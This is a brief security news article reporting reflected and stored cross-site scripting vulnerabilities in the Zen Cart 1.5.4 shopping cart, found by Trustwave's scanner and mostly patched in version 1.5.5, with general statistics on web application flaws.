Multiple Cross-Site Scripting (XSS) vulnerabilities have been uncovered in the popular online open source shopping cart application, Zen Cart.
XSS, allows the attacker to inject malicious client-side scripts into a website, which are later executed by the victims while browsing the website. There are different cross-site scripting variants, all of which can be used to craft different types of attacks. In this case, malicious XSS injections could result in hackers gaining access to cookies and sensitive information, and could allow site defacement, which can result in further attacks.
According to Trustwave, the vulnerabilities affect Zen Cart 1.5.4 and potentially prior versions—there are both reflective and stored XSS in multiple parameters of number of requests. They were discovered in the admin section of Zen Cart, and one issue in the non-authenticated portion of the application.
The revelation is not so surprising: XSS vulnerabilities still top the open-source vulnerability heap. Based on the scanning of almost 400 open source web applications by the Netsparker security scanning engine, XSS accounts for 67% of all the identified vulnerabilities. SQL injection vulnerabilities were a distant second, amounting to 20% of the total. The remaining 13% were made up of remote and local file inclusions, CSRF, remote command execution, command injection, open redirection, HTTP header injection (web server software issue) and frame injection.
The credentials for the application and the URL were provided to Trustwave App Scanner, which then crawled through the multiple pages of the application. Once an optimized set of pages were crawled, the smart attacks were added and an assessment run which returned multiple vulnerabilities.
Zen Cart has patched all but one vulnerability with new version 1.5.5—and has also released local patches in case upgrade is not possible right away. A single XSS issue is still present in the application, but due to CSRF protection for the request, exploiting the issue would require Admin privileges for the application, Trustwave said.
Photo © Myimagine